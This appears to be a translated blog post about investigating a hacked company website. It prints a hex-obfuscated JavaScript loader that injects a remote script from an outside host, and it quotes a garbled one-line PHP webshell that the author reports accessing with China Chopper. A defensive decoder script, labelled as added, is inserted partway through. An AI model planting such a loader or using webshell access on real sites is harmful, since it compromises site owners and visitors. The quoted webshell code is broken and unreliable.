Yesterday the manager came to the company again, saying that the company's website had been injected with malicious code.
Since I don't know penetration testing, I could only poke around.
First, I looked at what was in the home page file.
The three most glaring tags are:
There is also a piece of JS code. I searched for it on Baidu and found that this code mostly shows up on hacked websites, but I did not know what it was.
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
It is hexadecimal-encoded. Roughly decoding it gives this result:
From the look of it, it probably outputs the return value of that JS file onto the page.
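The hexadecimal decoding described above can be done statically, without running the injected line. The following is an added example, not code from the original post: it decodes the \xNN escapes as plain text and lists any script URL the decoded line would load. The function names and the three-line sample page are constructed for illustration.

```javascript
// Static decoder for \xNN-obfuscated script loaders (added example).
// Nothing is evaluated: the injected line is handled purely as text.

// The injected line from the home page, kept raw so the escapes stay literal.
const SAMPLE = String.raw`window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');`;

// Replace each \xNN escape with the character it encodes.
function decodeHexEscapes(text) {
  return text.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Collect the src URL of every <script ... src="..."> tag in decoded text.
function extractScriptSources(decoded) {
  const sources = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let match;
  while ((match = re.exec(decoded)) !== null) sources.push(match[1]);
  return sources;
}

// Report the lines of a file that hide a remote script loader behind escapes.
function findObfuscatedLoaders(fileText) {
  const findings = [];
  fileText.split(/\r?\n/).forEach((line, index) => {
    if (!/\\x[0-9a-fA-F]{2}/.test(line)) return; // no hex escapes on this line
    const decoded = decodeHexEscapes(line);
    const sources = extractScriptSources(decoded);
    if (sources.length > 0) {
      findings.push({ line: index + 1, decoded, sources });
    }
  });
  return findings;
}

// Constructed sample page: the injected line between two harmless lines.
const PAGE = ['<html><body>',
  '<script>' + SAMPLE + '</script>',
  '</body></html>'].join('\n');

for (const finding of findObfuscatedLoaders(PAGE)) {
  console.log(`line ${finding.line} loads: ${finding.sources.join(', ')}`);
  console.log(finding.decoded);
}
```

Running the same scan over every downloaded HTML, JS and PHP file shows which pages carry the same loader.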
At the bottom of the page, I found a bunch of links pointing to PHP files.
Then I looked at what on earth these PHP files were.
It turned out that the files were all identical; only the names differed. Skimming the PHP code, it appears to read the content at the address passed to the custom Reads method and output it.
Then I promptly opened that address, but because the company's website had been hacked for so long, the address unfortunately returned a 404.
Checking the logs
Now that I knew where the malicious code had been injected into the page, I had to find out how the attacker had obtained access.
First of all, guessing the FTP password is out of the question. The FTP passwords for all of the company's websites are randomly generated mixes of uppercase letters, lowercase letters and digits.
Then I downloaded all of the website's access logs, but they were too long to get through.
Next, I wanted to check the operation log in the admin back end, but the back end was written by my predecessors at the company. It is far from complete, let alone equipped with an operation log.
Truly stuck
How about SafeDog?
Since I don't have the skills to do it by hand, I used software to find where the backdoor is.
Here is Website SafeDog: http://free.safedog.cn/website_safedog.html
SafeDog, remember to pay me the advertising fee.
After downloading all the files from the website, a lot of trojans turned up.
Because I had played around with simple intrusions using a trojan in the past, I casually opened the second scan result, and one look confirmed it!!!
Next, I opened the trojan file. Only two lines of code in the whole file were live, and all the other code was commented out (just to disguise it as a DedeCMS file).
I copied these two lines of code into Baidu to see what they were.
$a=range (1200); $b=chr ($a).Chr ($a).Chr ($a).Chr ($a).Chr ($a).Chr;
Sure enough, it is a one-sentence trojan (a one-line webshell). According to Baidu, this trojan's password is 4.
Well, now that I knew it was a one-sentence trojan, I tried it out using a few odds and ends I had picked up in the past, plus the legendary China Chopper.
Sure enough, it connected and gave full permissions over the website.
To be continued
There is too much to say about penetration, and the most important thing is to protect your website properly. Friends, once security holes and trojan files are found, they should be removed promptly, so that the bad guys get no opportunity!!!
As for the vulnerabilities in the company's website... Emmmmm... still looking.